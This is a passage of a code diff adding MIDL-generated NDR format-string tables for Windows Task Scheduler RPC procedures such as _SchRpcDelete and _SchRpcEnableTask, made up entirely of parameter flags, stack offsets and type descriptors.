+/* 768 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 770 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 772 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 774 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 776 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 778 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 780 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 782 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 784 */	NdrFcShort( 0xd4 ),	/* Type Offset=212 */
+
+	/* Parameter arg_3 */
+
+/* 786 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 788 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 790 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 792 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 794 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 796 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 798 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 800 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 802 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_6 */
+
+/* 804 */	NdrFcShort( 0x4112 ),	/* Flags:  must free, out, simple ref, srv alloc size=16 */
+/* 806 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 808 */	NdrFcShort( 0x90 ),	/* Type Offset=144 */
+
+	/* Parameter arg_7 */
+
+/* 810 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 812 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 814 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcDelete */
+
+
+	/* Return value */
+
+/* 816 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 818 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 822 */	NdrFcShort( 0xd ),	/* 13 */
+/* 824 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 826 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 828 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 830 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 832 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 834 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x3,		/* 3 */
+/* 836 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 838 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 840 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 842 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 844 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 846 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 848 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 850 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 852 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 854 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 856 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 858 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 860 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 862 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcRename */
+
+
+	/* Return value */
+
+/* 864 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 866 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 870 */	NdrFcShort( 0xe ),	/* 14 */
+/* 872 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 874 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 876 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 878 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 880 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 882 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 884 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 886 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 888 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 890 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 892 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 894 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 896 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 898 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 900 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 902 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 904 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_2 */
+
+/* 906 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 908 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 910 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 912 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 914 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 916 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcScheduledRuntimes */
+
+
+	/* Return value */
+
+/* 918 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 920 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 924 */	NdrFcShort( 0xf ),	/* 15 */
+/* 926 */	NdrFcShort( 0x48 ),	/* X64 Stack size/offset = 72 */
+/* 928 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 930 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 932 */	NdrFcShort( 0x78 ),	/* 120 */
+/* 934 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 936 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x8,		/* 8 */
+/* 938 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 940 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 942 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 944 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 946 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 948 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 950 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 952 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 954 */	NdrFcShort( 0xa ),	/* Flags:  must free, in, */
+/* 956 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 958 */	NdrFcShort( 0xf2 ),	/* Type Offset=242 */
+
+	/* Parameter arg_2 */
+
+/* 960 */	NdrFcShort( 0xa ),	/* Flags:  must free, in, */
+/* 962 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 964 */	NdrFcShort( 0xf2 ),	/* Type Offset=242 */
+
+	/* Parameter arg_3 */
+
+/* 966 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 968 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 970 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 972 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 974 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 976 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 978 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 980 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 982 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_6 */
+
+/* 984 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 986 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 988 */	NdrFcShort( 0x104 ),	/* Type Offset=260 */
+
+	/* Parameter arg_7 */
+
+/* 990 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 992 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 994 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetLastRunInfo */
+
+
+	/* Return value */
+
+/* 996 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 998 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1002 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 1004 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 1006 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1008 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1010 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1012 */	NdrFcShort( 0x58 ),	/* 88 */
+/* 1014 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 1016 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1018 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1020 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1022 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1024 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1026 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 1028 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1030 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 1032 */	NdrFcShort( 0x4112 ),	/* Flags:  must free, out, simple ref, srv alloc size=16 */
+/* 1034 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1036 */	NdrFcShort( 0xf6 ),	/* Type Offset=246 */
+
+	/* Parameter arg_2 */
+
+/* 1038 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1040 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1042 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 1044 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1046 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1048 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetTaskInfo */
+
+
+	/* Return value */
+
+/* 1050 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 1052 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1056 */	NdrFcShort( 0x11 ),	/* 17 */
+/* 1058 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 1060 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1062 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1064 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 1066 */	NdrFcShort( 0x40 ),	/* 64 */
+/* 1068 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x5,		/* 5 */
+/* 1070 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1072 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1074 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1076 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1078 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1080 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 1082 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1084 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 1086 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 1088 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1090 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 1092 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1094 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1096 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 1098 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1100 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1102 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 1104 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1106 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 1108 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetNumberOfMissedRuns */
+
+
+	/* Return value */
+
+/* 1110 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 1112 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1116 */	NdrFcShort( 0x12 ),	/* 18 */
+/* 1118 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1120 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1122 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1124 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1126 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 1128 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x3,		/* 3 */
+/* 1130 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1132 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1134 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1136 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1138 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1140 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 1142 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1144 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 1146 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1148 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1150 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 1152 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1154 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1156 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcEnableTask */
+
+
+	/* Return value */
+
+/* 1158 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 1160 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1164 */	NdrFcShort( 0x13 ),	/* 19 */
+/* 1166 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1168 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1170 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1172 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 1174 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 1176 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x3,		/* 3 */
+/* 1178 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1180 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1182 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1184 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1186 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1188 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 1190 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1192 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 1194 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 1196 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1198 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 1200 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1202 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1204 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+			0x0
+        }
+    };
+
+static const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString =
+    {
+        0,
+        {
+			NdrFcShort( 0x0 ),	/* 0 */
+/*  2 */	
+			0x11, 0xc,	/* FC_RP [alloced_on_stack] [simple_pointer] */
+/*  4 */	0x8,		/* FC_LONG */
+			0x5c,		/* FC_PAD */
+/*  6 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/*  8 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 10 */	
+			0x11, 0x8,	/* FC_RP [simple_pointer] */
+/* 12 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 14 */	
+			0x12, 0x0,	/* FC_UP */
+/* 16 */	NdrFcShort( 0x18 ),	/* Offset= 24 (40) */
+/* 18 */	
+			0x1a,		/* FC_BOGUS_STRUCT */
+			0x3,		/* 3 */
+/* 20 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 24 */	NdrFcShort( 0x8 ),	/* Offset= 8 (32) */
+/* 26 */	0x36,		/* FC_POINTER */
+			0x36,		/* FC_POINTER */
+/* 28 */	0x8,		/* FC_LONG */
+			0x40,		/* FC_STRUCTPAD4 */
+/* 30 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 32 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 34 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 36 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 38 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 40 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 42 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 44 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x0,		/*  */
+/* 46 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 48 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 50 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 54 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 56 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 58 */	NdrFcShort( 0xffd8 ),	/* Offset= -40 (18) */
+/* 60 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 62 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 64 */	NdrFcShort( 0xffc6 ),	/* Offset= -58 (6) */
+/* 66 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 68 */	NdrFcShort( 0x2 ),	/* Offset= 2 (70) */
+/* 70 */	
+			0x12, 0x0,	/* FC_UP */
+/* 72 */	NdrFcShort( 0x2 ),	/* Offset= 2 (74) */
+/* 74 */	
+			0x1a,		/* FC_BOGUS_STRUCT */
+			0x3,		/* 3 */
+/* 76 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 78 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 80 */	NdrFcShort( 0x8 ),	/* Offset= 8 (88) */
+/* 82 */	0x8,		/* FC_LONG */
+			0x8,		/* FC_LONG */
+/* 84 */	0x36,		/* FC_POINTER */
+			0x36,		/* FC_POINTER */
+/* 86 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 88 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 90 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 92 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 94 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 96 */	
+			0x11, 0x8,	/* FC_RP [simple_pointer] */
+/* 98 */	0x8,		/* FC_LONG */
+			0x5c,		/* FC_PAD */
+/* 100 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 102 */	NdrFcShort( 0x2 ),	/* Offset= 2 (104) */
+/* 104 */	
+			0x12, 0x0,	/* FC_UP */
+/* 106 */	NdrFcShort( 0x2 ),	/* Offset= 2 (108) */
+/* 108 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 110 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 112 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x54,		/* FC_DEREFERENCE */
+/* 114 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 116 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 118 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 122 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 124 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 126 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 128 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 130 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 132 */	NdrFcShort( 0x2 ),	/* Offset= 2 (134) */
+/* 134 */	
+			0x12, 0x0,	/* FC_UP */
+/* 136 */	NdrFcShort( 0x14 ),	/* Offset= 20 (156) */
+/* 138 */	
+			0x1d,		/* FC_SMFARRAY */
+			0x0,		/* 0 */
+/* 140 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 142 */	0x1,		/* FC_BYTE */
+			0x5b,		/* FC_END */
+/* 144 */	
+			0x15,		/* FC_STRUCT */
+			0x3,		/* 3 */
+/* 146 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 148 */	0x8,		/* FC_LONG */
+			0x6,		/* FC_SHORT */
+/* 150 */	0x6,		/* FC_SHORT */
+			0x4c,		/* FC_EMBEDDED_COMPLEX */
+/* 152 */	0x0,		/* 0 */
+			NdrFcShort( 0xfff1 ),	/* Offset= -15 (138) */
+			0x5b,		/* FC_END */
+/* 156 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 158 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 160 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x54,		/* FC_DEREFERENCE */
+/* 162 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 164 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 166 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 170 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 172 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 174 */	NdrFcShort( 0xffe2 ),	/* Offset= -30 (144) */
+/* 176 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 178 */	
+			0x11, 0x0,	/* FC_RP */
+/* 180 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (144) */
+/* 182 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 184 */	NdrFcShort( 0x2 ),	/* Offset= 2 (186) */
+/* 186 */	
+			0x12, 0x0,	/* FC_UP */
+/* 188 */	NdrFcShort( 0x2 ),	/* Offset= 2 (190) */
+/* 190 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 192 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 194 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x54,		/* FC_DEREFERENCE */
+/* 196 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 198 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 200 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 204 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 206 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 208 */	NdrFcShort( 0xffc0 ),	/* Offset= -64 (144) */
+/* 210 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 212 */	
+			0x12, 0x0,	/* FC_UP */
+/* 214 */	NdrFcShort( 0x2 ),	/* Offset= 2 (216) */
+/* 216 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 218 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 220 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x0,		/*  */
+/* 222 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 224 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 226 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 230 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 232 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 234 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 236 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 238 */	
+			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
+/* 240 */	NdrFcShort( 0xffa0 ),	/* Offset= -96 (144) */
+/* 242 */	
+			0x12, 0x0,	/* FC_UP */
+/* 244 */	NdrFcShort( 0x2 ),	/* Offset= 2 (246) */
+/* 246 */	
+			0x15,		/* FC_STRUCT */
+			0x1,		/* 1 */
+/* 248 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 250 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 252 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 254 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 256 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 258 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 260 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 262 */	NdrFcShort( 0x2 ),	/* Offset= 2 (264) */
+/* 264 */	
+			0x12, 0x0,	/* FC_UP */
+/* 266 */	NdrFcShort( 0x2 ),	/* Offset= 2 (268) */
+/* 268 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x1,		/* 1 */
+/* 270 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 272 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x54,		/* FC_DEREFERENCE */
+/* 274 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 276 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 278 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 282 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 284 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 286 */	NdrFcShort( 0xffd8 ),	/* Offset= -40 (246) */
+/* 288 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 290 */	
+			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
